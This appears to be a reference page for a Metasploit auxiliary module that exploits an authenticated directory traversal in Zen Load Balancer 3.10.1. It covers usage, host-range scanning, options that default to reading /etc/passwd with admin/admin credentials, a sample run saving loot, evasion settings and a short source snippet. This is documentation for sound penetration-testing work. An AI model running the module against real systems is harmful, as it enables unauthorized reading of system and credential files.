Zen Load Balancer Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/zenload_balancer_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Zen Load Balancer Directory Traversal
Module: auxiliary/scanner/http/zenload_balancer_traversal
Source code: modules/auxiliary/scanner/http/zenload_balancer_traversal.rb
Disclosure date: 2020-04-10
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 444, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a authenticated directory traversal vulnerability in Zen Load Balancer v3.10.1. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/zenload_balancer_traversal
msf auxiliary(zenload_balancer_traversal) > show options
    ... show and set options ...
msf auxiliary(zenload_balancer_traversal) > set RHOSTS ip-range
msf auxiliary(zenload_balancer_traversal) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(zenload_balancer_traversal) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(zenload_balancer_traversal) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(zenload_balancer_traversal) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.

Vulnerable Application


Vulnerable ISO

Verification Steps


  1. ./msfconsole -q
  2. set RHOSTS <rhost>
  3. set RPORT <rport>
  4. set FILEPATH <filepath>
  5. set ssl <true/false>
  6. set HttpPassword <admin>
  7. set HttpUsername <admin>
  8. run

Scenarios


msf5 > use auxiliary/scanner/http/zenload_balancer_traversal 
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true 
SSL => true
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
[*] Running module against 192.168.1.101

[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/zenload_balancer_traversal) >

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/zenload_balancer_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/zenload_balancer_traversal

msf6 auxiliary(scanner/http/zenload_balancer_traversal) > show info

       Name: Zen Load Balancer Directory Traversal
     Module: auxiliary/scanner/http/zenload_balancer_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-04-10

Provided by:
  Basim Alabdullah
  Dhiraj Mishra

Check supported:
  No

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  DEPTH         16               yes       The max traversal depth
  FILEPATH      /etc/passwd      no        The name of the file to download
  HttpPassword  admin            no        The password to use for the HTTP server
  HttpUsername  admin            yes       The username to use for the HTTP server
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         444              yes       The target port (TCP)
  SSL           true             yes       Use SSL
  TARGETURI     /                yes       The base URI path of the ZenConsole install
  THREADS       1                yes       The number of concurrent threads (max one per host)
  VHOST                          no        HTTP server virtual host

Description:
  This module exploits a authenticated directory traversal 
  vulnerability in Zen Load Balancer `v3.10.1`. The flaw exists in 
  'index.cgi' not properly handling 'filelog=' parameter which allows 
  a malicious actor to load arbitrary file path.

References:
  https://www.exploit-db.com/exploits/48308

Module Options


This is a complete list of options available in the scanner/http/zenload_balancer_traversal auxiliary module:

msf6 auxiliary(scanner/http/zenload_balancer_traversal) > show options

Module options (auxiliary/scanner/http/zenload_balancer_traversal):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DEPTH         16               yes       The max traversal depth
   FILEPATH      /etc/passwd      no        The name of the file to download
   HttpPassword  admin            no        The password to use for the HTTP server
   HttpUsername  admin            yes       The username to use for the HTTP server
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         444              yes       The target port (TCP)
   SSL           true             yes       Use SSL
   TARGETURI     /                yes       The base URI path of the ZenConsole install
   THREADS       1                yes       The number of concurrent threads (max one per host)
   VHOST                          no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/zenload_balancer_traversal auxiliary module:

msf6 auxiliary(scanner/http/zenload_balancer_traversal) > show advanced

Module advanced options (auxiliary/scanner/http/zenload_balancer_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/zenload_balancer_traversal module can do:

msf6 auxiliary(scanner/http/zenload_balancer_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/zenload_balancer_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/zenload_balancer_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Nothing was downloaded


Here is a relevant code snippet related to the "Nothing was downloaded" error message:

59:	      },
60:	      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
61:	    }, 25)
62:	
63:	    unless res && res.code == 200
64:	      print_error('Nothing was downloaded')
65:	      return
66:	    end
67:	
68:	    print_good("#{peer} - Downloaded #{res.body.length} bytes")
69:	    path = store_loot(

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Basim Alabdullah
  • Dhiraj Mishra

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.